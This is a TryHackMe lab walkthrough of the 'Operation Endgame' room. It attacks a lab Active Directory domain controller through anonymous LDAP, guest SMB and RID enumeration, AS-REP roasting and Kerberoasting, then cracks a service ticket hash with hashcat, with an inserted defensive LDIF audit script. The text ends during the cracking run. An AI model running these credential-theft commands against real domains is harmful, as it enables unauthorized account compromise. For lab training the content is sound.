Introduction
This article is a TryHackMe writeup.
The room is Operation Endgame, and its difficulty is Hard.
In this room you can learn about abusing an Active Directory environment in Operation Endgame.
Recon
Port Scan
Nmap scan report for [target_ip]
Host is up, received reset ttl 126 (0.21s latency).
Scanned at 2026-04-18 21:16:04 JST for 144s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
80/tcp open http syn-ack ttl 126 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-04-18 12:16:11Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)
443/tcp open ssl/https? syn-ack ttl 126
|_ssl-date: 2026-04-18T12:18:19+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-12T07:26:00
| Not valid after: 2028-05-12T07:35:59
| MD5: c249 3bc6 fd31 f2aa 83cb 2774 bc66 9151
| SHA-1: 397a 54df c1ff f9fd 57e4 a944 00e8 cfdb 6e3a 972b
| SHA-256: 6915 c48a f18a bfee e8a2 084f 5088 8358 2582 11b5 f01a 7da0 3443 117b 8cbd 6031
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 126
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
|_ssl-date: 2026-04-18T12:18:19+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: AD
| DNS_Domain_Name: thm.local
| DNS_Computer_Name: ad.thm.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-18T12:17:10+00:00
| ssl-cert: Subject: commonName=ad.thm.local
| Issuer: commonName=ad.thm.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-17T12:13:45
| Not valid after: 2026-10-17T12:13:45
| MD5: 513c 3827 2e2c a645 6a6e 974f 41df dc3f
| SHA-1: c705 13f5 4655 e77d 470d c1a6 4742 1aa4 b022 5e6b
| SHA-256: a6c2 94b2 7335 7c61 caa1 463f 0eff a8cb 75c4 b841 ba9f 1531 3631 a481 7135 ed50
7680/tcp open pando-pub? syn-ack ttl 126
9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing
47001/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49681/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49696/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49711/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49717/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49732/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 25814/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46874/tcp): CLEAN (Couldn't connect)
| Check 3 (port 12125/udp): CLEAN (Failed to receive data)
| Check 4 (port 43375/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-04-18T12:17:11
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:18
Completed NSE at 21:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:18
Completed NSE at 21:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:18
Completed NSE at 21:18, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.19 seconds
Raw packets sent: 35 (1.516KB) | Rcvd: 32 (1.404KB)
Based on the port scan results above, we proceed with the investigation.
enum4linux
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Apr 18 21:27:06 2026
=========================================( Target Information )=========================================
Target ........... [target_ip]
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on [target_ip] )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for [target_ip] )===============================
Looking up status of [target_ip]
No reply from [target_ip]
===================================( Session Check on [target_ip] )===================================
[+] Server [target_ip] allows sessions using username '', password ''
================================( Getting domain SID for [target_ip] )================================
Domain Name: THM
Domain Sid: S-1-5-21-1966530601-3185510712-10604624
[+] Host is part of a domain (not a workgroup)
==================================( OS information on [target_ip] )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for [target_ip] from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on [target_ip] )=======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
=================================( Share Enumeration on [target_ip] )=================================
do_connect: Connection to [target_ip] failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on [target_ip]
===========================( Password Policy Information for [target_ip] )===========================
Password:
[E] Unexpected error from polenum:
[+] Attaching to [target_ip] using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:[target_ip])
[+] Trying protocol 445/SMB...
[!] Protocol failed: rpc_s_access_denied
[E] Failed to get password policy with rpcclient
======================================( Groups on [target_ip] )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on [target_ip] via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-5-21-1966530601-3185510712-10604624
[I] Found new SID:
S-1-5-21-1966530601-3185510712-10604624
[+] Enumerating users using SID S-1-5-21-1966530601-3185510712-10604624 and logon username '', password ''
S-1-5-21-1966530601-3185510712-10604624-500 THM\Administrator (Local User)
S-1-5-21-1966530601-3185510712-10604624-501 THM\Guest (Local User)
S-1-5-21-1966530601-3185510712-10604624-502 THM\krbtgt (Local User)
S-1-5-21-1966530601-3185510712-10604624-512 THM\Domain Admins (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-513 THM\Domain Users (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-514 THM\Domain Guests (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-515 THM\Domain Computers (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-516 THM\Domain Controllers (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-517 THM\Cert Publishers (Local Group)
S-1-5-21-1966530601-3185510712-10604624-518 THM\Schema Admins (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-519 THM\Enterprise Admins (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-520 THM\Group Policy Creator Owners (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-521 THM\Read-only Domain Controllers (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-522 THM\Cloneable Domain Controllers (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-525 THM\Protected Users (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-526 THM\Key Admins (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-527 THM\Enterprise Key Admins (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-1008 THM\AD$ (Local User)
[+] Enumerating users using SID S-1-5-21-803298453-2984830555-3352418973 and logon username '', password ''
S-1-5-21-803298453-2984830555-3352418973-500 AD\Administrator (Local User)
S-1-5-21-803298453-2984830555-3352418973-501 AD\Guest (Local User)
S-1-5-21-803298453-2984830555-3352418973-503 AD\DefaultAccount (Local User)
S-1-5-21-803298453-2984830555-3352418973-504 AD\WDAGUtilityAccount (Local User)
S-1-5-21-803298453-2984830555-3352418973-513 AD\None (Domain Group)
===============================( Getting printer info for [target_ip] )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sat Apr 18 21:36:40 2026
From the above, we can see that retrieving the password policy information requires password authentication, and that users were enumerated from the domain SID and RIDs.
Scanning
There does not seem to be any obvious lead, but there is one thing we can try.
Using ldapsearch, let's check whether the domain controller allows an LDAP null bind (anonymous bind).
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ ldapsearch -x -H ldap://[target_ip] -b "DC=thm,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=thm,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# thm.local
dn: DC=thm,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=thm,DC=local
instanceType: 5
whenCreated: 20230512072440.0Z
whenChanged: 20260418121336.0Z
subRefs: DC=ForestDnsZones,DC=thm,DC=local
subRefs: DC=DomainDnsZones,DC=thm,DC=local
subRefs: CN=Configuration,DC=thm,DC=local
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAzIq23BrAck2BE8AI/Pqy+g==
uSNChanged: 286789
name: thm
objectGUID:: uJV0oyUyQUCfgYWXQdbMjA==
creationTime: 134209880165348782
forceLogoff: -9223372036854775808
lockoutDuration: -6000000000
lockOutObservationWindow: -6000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
nextRid: 1008
pwdProperties: 0
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAAKeA2dTgJ371Q0KEA
serverState: 1
uASCompat: 1
modifiedCount: 1
auditingPolicy:: AAE=
nTMixedDomain: 0
rIDManagerReference: CN=RID Manager$,CN=System,DC=thm,DC=local
fSMORoleOwner: CN=NTDS Settings,CN=AD,CN=Servers,CN=Default-First-Site-Name,CN
=Sites,CN=Configuration,DC=thm,DC=local
systemFlags: -1946157056
wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=thm,
DC=local
wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Progra
m Data,DC=thm,DC=local
wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=thm
,DC=local
wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrin
cipals,DC=thm,DC=local
wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=
thm,DC=local
wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=t
hm,DC=local
wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=thm
,DC=local
wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=thm,DC=lo
cal
wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,
DC=thm,DC=local
.......
.......
As a result, we were able to collect a lot of information.
Looking through it, we run the following commands to collect the users that enum4linux did not enumerate either.
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ ldapsearch -x -H ldap://10.48.183.252 -b "DC=thm,DC=local" "(objectClass=user)" > users_full.txt
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ grep -i "description" users_full.txt
description: Tier 1 User
description: Tier 1 User
description: Tier 1 User
description: Tier 1 User
description: Tier 1 User
description: Tier 1 User
description: Tier 1 User
....
....
description: Tier 1 User
description: Tier 1 User
$ grep -i "servicePrincipalName" users_full.txt
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ad.thm.local
servicePrincipalName: ldap/ADD/THM
servicePrincipalName: HOST/AD/thm.local
servicePrincipalName: ldap/LABYRINTH/ForestDnsZones.thm.local
servicePrincipalName: HOST/LABYRINTH/THM
servicePrincipalName: ldap/AD/ForestDnsZones.thm.local
servicePrincipalName: ldap/ADD/ForestDnsZones.thm.local
servicePrincipalName: ldap/LABYRINTH/THM
servicePrincipalName: ldap/LABYRINTH/DomainDnsZones.thm.local
servicePrincipalName: HOST/ADD/thm.local
servicePrincipalName: ldap/AD/DomainDnsZones.thm.local
servicePrincipalName: ldap/ADD/DomainDnsZones.thm.local
servicePrincipalName: HOST/LABYRINTH/thm.local
servicePrincipalName: GC/ADD/thm.local
servicePrincipalName: ldap/LABYRINTH/thm.local
servicePrincipalName: GC/LABYRINTH/thm.local
servicePrincipalName: ldap/AD/thm.local
servicePrincipalName: ldap/ADD/thm.local
servicePrincipalName: GC/AD/thm.local
servicePrincipalName: HOST/ADD/THM
servicePrincipalName: TERMSRV/LABYRINTH
servicePrincipalName: RestrictedKrbHost/LABYRINTH
servicePrincipalName: HOST/LABYRINTH
servicePrincipalName: ldap/LABYRINTH
servicePrincipalName: HOST/AD/THM
servicePrincipalName: ldap/AD/THM
servicePrincipalName: ldap/ad.thm.local/ForestDnsZones.thm.local
servicePrincipalName: ldap/ad.thm.local/DomainDnsZones.thm.local
servicePrincipalName: TERMSRV/AD
servicePrincipalName: TERMSRV/ad.thm.local
servicePrincipalName: DNS/ad.thm.local
servicePrincipalName: GC/ad.thm.local/thm.local
servicePrincipalName: RestrictedKrbHost/ad.thm.local
servicePrincipalName: RestrictedKrbHost/AD
servicePrincipalName: HOST/ad.thm.local/THM
servicePrincipalName: HOST/AD
servicePrincipalName: HOST/ad.thm.local
servicePrincipalName: HOST/ad.thm.local/thm.local
servicePrincipalName: ldap/ad.thm.local/THM
servicePrincipalName: ldap/AD
servicePrincipalName: ldap/ad.thm.local
servicePrincipalName: ldap/ad.thm.local/thm.local
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/add.thm.local
servicePrincipalName: ldap/add.thm.local/ForestDnsZones.thm.local
servicePrincipalName: ldap/add.thm.local/DomainDnsZones.thm.local
servicePrincipalName: TERMSRV/ADD
servicePrincipalName: TERMSRV/add.thm.local
servicePrincipalName: DNS/add.thm.local
servicePrincipalName: GC/add.thm.local/thm.local
servicePrincipalName: RestrictedKrbHost/add.thm.local
servicePrincipalName: RestrictedKrbHost/ADD
servicePrincipalName: HOST/add.thm.local/THM
servicePrincipalName: HOST/ADD
servicePrincipalName: HOST/add.thm.local
servicePrincipalName: HOST/add.thm.local/thm.local
servicePrincipalName: ldap/add.thm.local/THM
servicePrincipalName: ldap/ADD
servicePrincipalName: ldap/add.thm.local
servicePrincipalName: ldap/add.thm.local/thm.local
servicePrincipalName: RPC/dcb68acc-c01a-4d72-8113-c008fcfab2fa._msdcs.thm.loca
servicePrincipalName: E3514235-4B06-11D1-AB04-00C04FC2DCD2/dcb68acc-c01a-4d72-
servicePrincipalName: ldap/dcb68acc-c01a-4d72-8113-c008fcfab2fa._msdcs.thm.loc
With that, we easily collected the usernames of the user accounts.
However, this alone does not tell us much.
For now, a reasonable approach seems to be to identify user accounts whose logon name (the sAMAccountName, used to support clients and servers running earlier versions of the operating system) is paired with an SPN.
This is because it naturally lets us find accounts with higher privileges.
I searched with the following command.
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ grep -E "sAMAccountName|servicePrincipalName" users_full.txt | grep -B 1 "servicePrincipalName"
sAMAccountName: AD$
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ad.thm.local
servicePrincipalName: ldap/ADD/THM
servicePrincipalName: HOST/AD/thm.local
servicePrincipalName: ldap/LABYRINTH/ForestDnsZones.thm.local
servicePrincipalName: HOST/LABYRINTH/THM
servicePrincipalName: ldap/AD/ForestDnsZones.thm.local
servicePrincipalName: ldap/ADD/ForestDnsZones.thm.local
servicePrincipalName: ldap/LABYRINTH/THM
servicePrincipalName: ldap/LABYRINTH/DomainDnsZones.thm.local
servicePrincipalName: HOST/ADD/thm.local
servicePrincipalName: ldap/AD/DomainDnsZones.thm.local
servicePrincipalName: ldap/ADD/DomainDnsZones.thm.local
servicePrincipalName: HOST/LABYRINTH/thm.local
servicePrincipalName: GC/ADD/thm.local
servicePrincipalName: ldap/LABYRINTH/thm.local
servicePrincipalName: GC/LABYRINTH/thm.local
servicePrincipalName: ldap/AD/thm.local
servicePrincipalName: ldap/ADD/thm.local
servicePrincipalName: GC/AD/thm.local
servicePrincipalName: HOST/ADD/THM
servicePrincipalName: TERMSRV/LABYRINTH
servicePrincipalName: RestrictedKrbHost/LABYRINTH
servicePrincipalName: HOST/LABYRINTH
servicePrincipalName: ldap/LABYRINTH
servicePrincipalName: HOST/AD/THM
servicePrincipalName: ldap/AD/THM
servicePrincipalName: ldap/ad.thm.local/ForestDnsZones.thm.local
servicePrincipalName: ldap/ad.thm.local/DomainDnsZones.thm.local
servicePrincipalName: TERMSRV/AD
servicePrincipalName: TERMSRV/ad.thm.local
servicePrincipalName: DNS/ad.thm.local
servicePrincipalName: GC/ad.thm.local/thm.local
servicePrincipalName: RestrictedKrbHost/ad.thm.local
servicePrincipalName: RestrictedKrbHost/AD
servicePrincipalName: HOST/ad.thm.local/THM
servicePrincipalName: HOST/AD
servicePrincipalName: HOST/ad.thm.local
servicePrincipalName: HOST/ad.thm.local/thm.local
servicePrincipalName: ldap/ad.thm.local/THM
servicePrincipalName: ldap/AD
servicePrincipalName: ldap/ad.thm.local
servicePrincipalName: ldap/ad.thm.local/thm.local
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/add.thm.local
servicePrincipalName: ldap/add.thm.local/ForestDnsZones.thm.local
servicePrincipalName: ldap/add.thm.local/DomainDnsZones.thm.local
servicePrincipalName: TERMSRV/ADD
servicePrincipalName: TERMSRV/add.thm.local
servicePrincipalName: DNS/add.thm.local
servicePrincipalName: GC/add.thm.local/thm.local
servicePrincipalName: RestrictedKrbHost/add.thm.local
servicePrincipalName: RestrictedKrbHost/ADD
servicePrincipalName: HOST/add.thm.local/THM
servicePrincipalName: HOST/ADD
servicePrincipalName: HOST/add.thm.local
servicePrincipalName: HOST/add.thm.local/thm.local
servicePrincipalName: ldap/add.thm.local/THM
servicePrincipalName: ldap/ADD
servicePrincipalName: ldap/add.thm.local
servicePrincipalName: ldap/add.thm.local/thm.local
servicePrincipalName: RPC/dcb68acc-c01a-4d72-8113-c008fcfab2fa._msdcs.thm.loca
servicePrincipalName: E3514235-4B06-11D1-AB04-00C04FC2DCD2/dcb68acc-c01a-4d72-
servicePrincipalName: ldap/dcb68acc-c01a-4d72-8113-c008fcfab2fa._msdcs.thm.loc
--
sAMAccountName: CODY_ROY
servicePrincipalName: HTTP/server.secure.com
And sure enough, we got a hit.
It looks like CODY_ROY is the username to focus on as we continue the investigation.
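Added example (not from the writeup or from any tool it uses): a small Python audit that parses the ldapsearch LDIF export, decodes the domain password-policy attributes seen in the null-bind output above (the 100 ns tick intervals, lockoutThreshold, pwdProperties) into human units, and lists user accounts that carry an SPN while skipping computer accounts such as AD$, which the grep -B 1 pairing above also matched. The LDIF input is a constructed sample in the shape of that output.

```python
"""Audit an ldapsearch LDIF export for Kerberoastable users and a weak password
policy. Added example; not part of the original writeup or of any tool it uses."""

# Constructed sample in the shape of the ldapsearch output above: the domain
# object (one value folded over two lines, as LDIF does), the DC's computer
# account and one user account.
SAMPLE_LDIF = """\
dn: DC=thm,DC=local
objectClass: domainDNS
lockoutDuration: -6000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdLength: 7
pwdProperties: 0
fSMORoleOwner: CN=NTDS Settings,CN=AD,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=thm,DC=local

dn: CN=AD,OU=Domain Controllers,DC=thm,DC=local
objectClass: user
objectClass: computer
sAMAccountName: AD$
servicePrincipalName: HOST/ad.thm.local
servicePrincipalName: ldap/ad.thm.local

dn: CN=CODY_ROY,OU=Tier 1,DC=thm,DC=local
objectClass: user
sAMAccountName: CODY_ROY
servicePrincipalName: HTTP/server.secure.com
"""

TICKS_PER_SECOND = 10_000_000  # AD stores these intervals as negative 100 ns ticks


def parse_ldif(text):
    """Return a list of entries (attribute -> list of values) from LDIF text."""
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:   # folded continuation line
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)
    entries, current = [], {}
    for line in unfolded:
        if not line.strip():                    # blank line ends an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):                # ldapsearch comment line
            continue
        attr, _, value = line.partition(":")
        current.setdefault(attr, []).append(value.strip())
    if current:
        entries.append(current)
    return entries


def kerberoastable_users(entries):
    """(sAMAccountName, [SPNs]) for user accounts with an SPN; computer accounts
    and krbtgt, which a plain grep pairing also matches (AD$ above), are skipped."""
    found = []
    for e in entries:
        classes = e.get("objectClass", [])
        if "user" not in classes or "computer" in classes:
            continue
        sam = e.get("sAMAccountName", [""])[0]
        if not sam or sam.endswith("$") or sam.lower() == "krbtgt":
            continue
        spns = e.get("servicePrincipalName", [])
        if spns:
            found.append((sam, spns))
    return found


def password_policy(entries):
    """Decode the domain object's policy attributes into human units."""
    dom = next(e for e in entries if "domainDNS" in e.get("objectClass", []))

    def seconds(attr):
        return abs(int(dom[attr][0])) // TICKS_PER_SECOND

    return {
        "max_pwd_age_days": seconds("maxPwdAge") // 86400,
        "lockout_duration_min": seconds("lockoutDuration") // 60,
        "lockout_threshold": int(dom["lockoutThreshold"][0]),
        "min_pwd_length": int(dom["minPwdLength"][0]),
        # bit 0 of pwdProperties is DOMAIN_PASSWORD_COMPLEX
        "complexity_required": bool(int(dom["pwdProperties"][0]) & 1),
    }


def policy_findings(policy):
    """Flag the settings that make spraying and offline cracking cheap."""
    findings = []
    if policy["lockout_threshold"] == 0:
        findings.append("lockoutThreshold 0: no lockout, spraying is unthrottled")
    if policy["min_pwd_length"] < 14:
        findings.append(f"minPwdLength {policy['min_pwd_length']}: below 14")
    if not policy["complexity_required"]:
        findings.append("pwdProperties lacks DOMAIN_PASSWORD_COMPLEX")
    return findings
```

Run it against a real export by passing the contents of users_full.txt (or the full base export) to parse_ldif instead of SAMPLE_LDIF.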
Exploitation
Let's check whether a Kerberoasting attack using impacket-GetUserSPNs actually yields a TGS ticket.
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ impacket-GetUserSPNs thm.local/ -dc-ip [target_ip] -request -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------- -------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/server.secure.com CODY_ROY CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local 2024-05-10 23:06:07.611965 2024-04-25 00:41:18.970113
[-] CCache file is not found. Skipping...
[-] invalid principal syntax
Unfortunately, it does not look like one will be issued.
Let's also run directory enumeration against server.secure.com, which was found earlier, to see whether there is anything there.
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u server.secure.com
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://server.secure.com
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
aspnet_client (Status: 301) [Size: 162] [--> http://server.secure.com/aspnet_client/]
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished
Nothing of note.
After much deliberation, I took a quick peek at someone else's writeup.
I had completely forgotten: apparently the SMB shares can be enumerated as the guest user.
I verified this.
$ nxc smb [target_ip] -u 'guest' -p '' --shares
SMB 10.48.183.252 445 AD [*] Windows 10 / Server 2019 Build 17763 x64 (name:AD) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB [target_ip] 445 AD [+] thm.local\guest:
SMB [target_ip] 445 AD [*] Enumerated shares
SMB [target_ip] 445 AD Share Permissions Remark
SMB [target_ip] 445 AD ----- ----------- ------
SMB [target_ip] 445 AD ADMIN$ Remote Admin
SMB [target_ip] 445 AD C$ Default share
SMB [target_ip] 445 AD IPC$ READ Remote IPC
SMB [target_ip] 445 AD NETLOGON Logon server share
SMB [target_ip] 445 AD SYSVOL Logon server share
A painful mistake.
From here, we collect the user accounts again.
$ nxc smb [target_ip] -u 'guest' -p '' --rid > rid_brute.txt
$ cat rid_brute.txt | grep "SidTypeUser" | cut -d'\' -f2 | cut -d' ' -f1 > usernames.txt
At this point, add the following entry to /etc/hosts.
[target_ip] AD.thm.local thm.local AD
After configuring that, I used the collected usernames to check with NetExec whether AS-REP hashes would be issued, and they were.
$ nxc ldap AD.thm.local -u usernames.txt -p '' --asreproast nxc-asreproasting.txt
I tried cracking them, but without success.
$ sudo hashcat -a 0 -m 18200 nxc-asreproasting.txt /usr/share/wordlists/rockyou.txt
Next, let's switch the target from the IP address to the domain name and check whether a Kerberoasting attack works.
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ nxc ldap AD.thm.local -u guest -p '' --kerberoasting nxc-kerberoasting.txt
LDAP [target_ip] 389 AD [*] Windows 10 / Server 2019 Build 17763 (name:AD) (domain:thm.local) (signing:None) (channel binding:No TLS cert)
LDAP [target_ip] 389 AD [+] thm.local\guest:
LDAP [target_ip] 389 AD [*] Total of records returned 1
LDAP [target_ip] 389 AD [*] sAMAccountName: CODY_ROY, memberOf: CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local, pwdLastSet: 2024-05-10 23:06:07.611965, lastLogon: 2024-04-25 00:41:18.970113
LDAP [target_ip] 389 AD $krb5tgs$23$*CODY_ROY$THM.LOCAL$thm.local\CODY_ROY*$faccfb441ea5a0322f3c625e5256b5ba$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
And sure enough, it dumped a TGS ticket for CODY_ROY.
Cracking it, I succeeded in recovering the password.
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ echo '$krb5tgs$23$*CODY_ROY$THM.LOCAL$thm.local\CODY_ROY*$faccfb441ea5a0322f3c625e5256b5ba$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' > cody.hash
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ hashcat -m 13100 cody.hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-AMD Ryzen 5 PRO 8640HS w/ Radeon 760M Graphics, 4779/9558 MB (2048 MB allocatable), 12MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 515 MB (7604 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
